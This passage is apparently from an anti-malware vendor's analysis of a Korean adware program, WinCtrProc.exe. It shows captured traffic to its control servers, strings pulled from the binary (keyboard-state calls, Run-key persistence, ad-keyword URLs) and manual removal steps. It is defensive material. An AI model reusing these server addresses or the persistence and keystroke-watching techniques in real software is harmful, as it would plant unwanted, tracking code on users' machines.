Set-Cookie: ASPSESSIONIDQACSRTDC=KEBBKILDFLDOKHGLEAOFGIMG; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:44 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y......


GET /Config/NewConf/ProgramUpdateLab.asp?version=1681 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.23
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQACSRTDC=KEBBKILDFLDOKHGLEAOFGIMG


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:47 GMT
1681|WinCtrProc.exe..



GET /Config/AdNw/StakePsList.asp?uno=3 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: maketop.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCAQBCSAA=NOKPLHLDCIBHJNLODFPKMIEI; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:40 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..



GET /Config/ProgramGuard.asp?uno=3030&ver=0000&wver=5 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.46
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:10 GMT
Content-Length: 1160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=ks_c_5601-1987"/>..<title>
500 - .... .... .....</title>..<style type="text/css">..&l
t;!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvet
ica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15p
x;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;mar
gin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#00
0000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-f
amily:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-colo
r:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-co
ntainer{background:#FFF;width:96%;margin-top:8px;padding:10px;position
:relative;}..-->..</style>..</head>..<body>..<
div id="header"><h1>.... ....</h1></div>..<div
 id="content">.. <div class="content-container"><fieldset&
gt;..  <h2>500 - .... .... .....</h2>..  <h3>.... ..
.. ........ ...... .... ...... .. .........</h3>.. </fieldset
></div>..</div>..</body>..</html>....



GET /Config/AdNw/StakePsList.asp?uno=5 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSTTAAQQ=MMCDJILDGFBIEHHEBNGIPCEL; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:43 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..







The PUP connects to the servers at the folowing location(s):







WinCtrProc.exe_600:




.text
`.data
.rsrc
MSVBVM60.DLL
InetCtlsObjects.Inet
WebBrowser1
SHDocVwCtl.WebBrowser
vb6ko.dll
ieframe.dll
WebBrowser
MSINET.OCX
KeywordForm
GetKeyState
shell32.dll
ShellExecuteA
EnumWindows
C:\Windows\System32\ieframe.oca
GetAsyncKeyState
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
C:\Windows\system32\MSINET.oca
GetWindowsDirectoryA
UpdateLayeredWindows
User32.DLL
WSOCK32.DLL
vb6stkit.dll
GetKeyboardState
URLEncode
VBA6.DLL
advapi32.dll
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
C:\Windows\system32\msvbvm60.dll\3
kernel32.dll
WinExec
2008:02:21 11:10:24
urlTEXT
MsgeTEXT
HhXXp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x='adobe:ns:meta/' x:xaptk='XMP toolkit 2.8.2-33, framework 1.5'>
<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>
<rdf:Description about='uuid:25326700-e021-11dc-8e7f-a474304460f4'
xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:253266fe-e021-11dc-8e7f-a474304460f4</xapMM:DocumentID>
hXXp://
\WinCtrPrc(20140224)\WinCtrPrc\WinFormProcess.vbp
78E1BDD1-9941-11cf-9756-00AA00C00908
2.asp
3.asp
/config/formactive.asp?uno=
&url=
&keyword=
&keyno=
&kind=PORTAL
microsoft.com
/config/FormActive.asp?uno=
/config/FormActive_Distinct.asp?uno=
/config/Formactive_Distinct.asp?uno=
&kind=KEYWORD
st.asp?uno=
/Config/FormLocation.asp
/Config/AdNw/FcPimSLab.asp
/Config/newConf/UCg_LPrMLab.asp?user_no=
/Config/TransSiteString.asp?nation=
/Config/FileNameDataMicro.asp
SetDownValue.asp?uno=
software\microsoft\windows\currentversion\run
/Config/UrlEncodeDecode.asp?q=
/Config/MakeStartPage.asp?uno=
&key=
?keyword=
?key=
keyword=
/Config/MakeSearchPage.asp?uno=
/Config/MakeIcon.asp?uno=
[KEYWORD]
/Config/TargetDataConnect.asp?p=&uno=
/Config/MakeProgram.asp?uno=
%Program Files%\micrOLAb\SearchEngin\LanguageConvert
/Config/ServerList.asp?uno=
hXXp://koreaserver.kr
hXXp://domainserver.co.kr
hXXp://hostserver.kr
hXXp://mainserver.kr
hXXp://makevalue.com
hXXp://duzip.com
hXXp://maketop.kr
hXXp://itemprice.kr
2000-10-01
Software\Microsoft\Windows\currentversion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\Currentversion\Run
VB6KO.DLL
msvbvm60.dll
wshom.ocx
ERROR_URL
/advertisebanner/keyword/
/advertisedistinct/keyword/
InternetExplorer.Application
/Config/Pop_Key_MainPlatinum.asp?uno=
keyboard
/Config/Pop_Key_MainDistinct.asp?uno=
&distinct=keyword
error_url
hXXp://VVV.naver.com
/Config/ipget.asp?kn=first&usd=
Windows 32s
Windows 95/98
Windows NT
/config/keyword_platinum.asp?user_no=
[adminkeywordpop]
[/adminkeywordpop]
[keywordpop]
[/keywordpop]
/Config/ipget.asp?kn=every&usd=
MicroProCon.exe
MicroProProc.exe
RetainPt.exe
RetainComp.exe
00000001
in.asp?uno=
Software\Microsoft\Windows\currentversion\run
00000060
.asp?version=
.asp?user_no=
.asp?uno=
Error getting subkey value.
/Config/GuideSiteString.asp?p=
.dictionary
dic.daum
dic.naver
dic.nate
http:
https:
로
을
e.asp?p=
.asp?p=
roLab.asp?p=
Code.asp?p=
hXXps://
ode.asp?uno=
/Config/KeySt
ab.asp?p=
/Config/SiteLink_Code.asp?uno=
/Config/ConvertLanguagemicrOLAb.asp?p=
/Config/OvertureDataConnect.asp?p=&uno=
/Config/RankeyLink_Code.asp?uno=
/advertisebanner/keyword
/advertisedistinct/keyword
JOIN
KEYWORD
\Internet Explorer\iexplore.exe
WScript.Shell
%Program Files%\Internet Explorer\iexplore.exe
/Config/KeyStringmicrOLAbPop.asp?p=
wscript.shell
/Config/GolbalString.asp?p=
/Config/TransSiteString_Commit.asp?site=
/Config/FindBrowserCode.asp?p=
iexplorer.exe
PORTUGAL
from portugal
to portugal
opera
Error opening key.
firefox
chrome
mozilla
Chrome_OmniboxView
netpia.com
WinCtrProc.exe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    GuardConvert.exe:1104
    MicroProProc.exe:2020
    MicroProProc.exe:596
    MicroProCon.exe:1492
    %original file name%.exe:452
    WinCtrCon.exe:1684
    WinCtrProc.exe:600
    mscorsvw.exe:172
    irsetup.exe:956
    

    2. 

  2. Delete the original PUP file.
    3. 

  3. Delete or disinfect the following files created/modified by the PUP:
    

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ServerList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\UCg_LPrMLab[1].htm (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe (52969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\TransSiteString[1].htm (12 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (52969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\StakePsList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormLocation[1].htm (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\FcPimSLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\ServerList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormChecktimemicroLab[1].htm (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe (409017 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\ProgramUpdateLab[1].htm (21 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe (409017 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (1861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe (418761 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\sTakeList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ProgramUpdateLab[1].htm (19 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (418761 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FcTimeLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FormLocation[1].htm (5 bytes)
    %Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\UCg_LPrMLab[1].htm (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\FcPimSLab[1].htm (157 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\TransSiteString[1].htm (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\StakePsList[1].htm (917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\keyword_platinum[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe (89729 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe (2712 bytes)
    %System%\VB6KO.DLL (2712 bytes)
    %System%\MSINET.OCX (2784 bytes)
    %Documents and Settings%\%current user%\Application Data\GuardSupport\GuardConvert.exe (2784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.dat (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (15807 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml (930 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe (4102 bytes)
    %Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG1.JPG (2 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -GbRIWgPPC"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -GbRIWgPPC"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabCon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe -yTJAOYH"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabProc" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe -yTJAOYH"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -HcSJXhQQ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -HcSJXhQQ"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -aukbpz"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -aukbpz"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabCon" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "MicroLabProc" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now